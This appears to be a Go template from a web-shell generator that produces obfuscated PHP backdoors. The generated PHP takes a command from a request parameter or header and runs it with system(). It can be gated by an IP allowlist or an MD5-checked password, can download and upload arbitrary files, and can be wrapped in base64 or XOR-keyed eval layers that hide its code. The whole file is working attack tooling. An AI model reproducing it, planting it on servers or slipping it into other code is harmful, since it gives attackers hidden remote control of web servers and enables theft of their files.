{{/* Get command from param or header */}}
{{ if ne .CmdHeader "" }}
  {{ index .V "cmd" }} = $_SERVER['HTTP_{{ .CmdHeader }}'];
{{ else }}

{{ if ne .Method "GET" }}
  parse_str(file_get_contents('php://input'), $_REQUEST);
{{ end }}

  {{ index .V "cmd" }} = $_REQUEST['{{ .CmdParam }}'];
{{ end }}
  {{ index .V "cmd" }} = trim({{ index .V "cmd" }});


{{ if .Whitelist }}
  {{ index .V "whitelist" }} = array({{ .Whitelist }});
  if (!in_array($_SERVER['REMOTE_ADDR'], {{ index .V "whitelist" }})) {
    die;
  }
{{- end }}


{{ if ne .Password "" }}
  {{ index .V "hash" }} = '{{ .PasswordHash }}';
{{ if ne .PasswordParam "" }}

{{ if ne .Method "" }}
  {{ index .V "pass" }} = $_REQUEST['{{ .PasswordParam }}'];
{{ end }}

{{ else if ne .PasswordHeader "" }}
  {{ index .V "pass" }} = $_SERVER['HTTP_{{ .PasswordHeader }}'];
{{ end }}
  if (md5({{ index .V "pass" }}) != {{ index .V "hash" }}) {
    die;
  }
{{- end }}


{{ if .FileCapabilities }}
  if (substr({{ index .V "cmd" }}, 0, 4) === 'get ') {
    {{ index .V "cmdArgs" }} = explode(' ', {{ index .V "cmd" }});
    {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
    if (!file_exists({{ index .V "filePath" }})) {
      header("HTTP/1.1 404 Not Found");
      die;
    }
    header("Content-Disposition: attachment; filename={{ index .V "filePath" }}");
    header("Content-Type: application/octet-stream");
    header("Content-Transfer-Encoding: binary");
    header('Content-Length: ' . filesize({{ index .V "filePath" }}));
    readfile({{ index .V "filePath" }});
    die;
  } else if (substr({{ index .V "cmd" }}, 0, 4) === 'put ') {
    {{ index .V "cmdArgs" }} = explode(' ', {{ index .V "cmd" }});
    {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
    {{ index .V "destPath" }} = basename({{ index .V "cmdArgs" }}[1]);
    if (count({{ index .V "cmdArgs" }}) > 2) {
      {{ index .V "destPath" }} = {{ index .V "cmdArgs" }}[2];
    }
    if (file_exists({{ index .V "destPath" }})) {
      echo {{ index .V "destPath" }}.' already exists';
      die;
    }
    file_put_contents({{ index .V "destPath" }}, file_get_contents('php://input'));
    echo 'Uploaded '.{{ index .V "filePath" }}.' to '.{{ index .V "destPath" }};
    die;
  }
{{ end }}

  system({{ index .V "cmd" }});
  die;



{{- define "b64" }}
eval(base64_decode('{{ .EncCode }}'))
{{ end }}



{{ define "xor" }}
{{ if ne .EncHeader "" -}}
  {{ index .V "encKey" }} = $_SERVER['HTTP_{{ .EncHeader }}'];
{{ else if eq .Method "GET" -}}
  {{ index .V "encKey" }} = $_REQUEST['{{ .EncParam }}'];
{{ else if eq .Method "POST" -}}
  {{ index .V "encKey" }} = json_decode(file_get_contents('php://input'), true)['{{ .EncParam }}'];
{{ end -}}

{{ index .V "encSrc" }} = base64_decode('{{ .EncCode }}');
{{ index .V "dSrc" }} = "";
for({{ index .V "i" }}=0; {{ index .V "i" }}<strlen({{ index .V "encSrc" }}); ) {
  for({{ index .V "ii" }}=0; ({{ index .V "ii" }}<strlen({{ index .V "encKey" }}) && {{ index .V "i" }}<strlen({{ index .V "encSrc" }})); {{ index .V "ii" }}++,{{ index .V "i" }}++) {
    {{ index .V "dSrc" }} .= {{ index .V "encSrc" }}{ {{ index .V "i" }} } ^ {{ index .V "encKey" }}{ {{ index .V "ii" }} };
  }
}
eval({{ index .V "dSrc" }});
{{ end }}
